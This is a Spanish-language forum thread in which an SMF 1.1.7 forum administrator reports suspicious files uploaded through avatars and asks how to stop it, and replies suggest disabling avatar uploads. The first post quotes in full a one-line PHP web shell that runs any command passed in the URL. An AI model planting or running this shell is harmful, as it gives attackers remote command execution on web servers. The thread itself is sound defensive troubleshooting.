Tengo un problema en mi foro SMF 1.1.7 y es que un usuario logra subir archivos malintencionados al ftp y mi sospecha es que los sube por medio de los avatares
por ejemplo hace unos dias logró subir 3 archivos sospechosos: 2 de ellos eran php y el otro GIF y los 3 tenian este codigo adentro:
<? if(isset($_GET[cmd])) system($_GET[cmd]) ?>
incluso vi que el settings_bak.php habia sido editado esa misma fecha, lo que me hace creer que supo los datos de todo .....
Yo los volvi a cambiar y obviamente eliminé esos archivos (los tengo en mi pc, si quieren se los adjunto) y estoy vigilando siempre las fechas de modificacion de los archivos para saber si hubo algun cambio o archivo nuevo
Mi duda es la siguiente: puede alguien malintencionado subir como avatar un archivo GIF camuflado con ese codigo y despues ejecutarlo? que se puede lograr con esto? hay modo de evitarlo? es problema de SMF o del servidor?
Agradezco la ayuda que me puedan brindar
Está claro que se trata de un bug. No entiendo mucho del tema pero parece que la versión 1.1.7 debe ser revisada rápidamente para tapar ese agujero. Sólo se me ocurre que se desactive la opción de subir avatares propios hasta que se solucione el problema.
Saludos.
perdon por reflotar el tema, pero encontré esta info que confirma mi teoria que por medio de los avatares (o adjuntos) se sube codigo oculto en la version 1.1.7
http://foro.elhacker.net/printpage.html;topic=239529.0
En los temas que da de ejemplo ya se trataba el "problema" (y el otro es este mismo tema).
Además, aquí te dejo esto:
http://www.simplemachines.org/community/index.php?topic=283945.msg1863920#msg1863920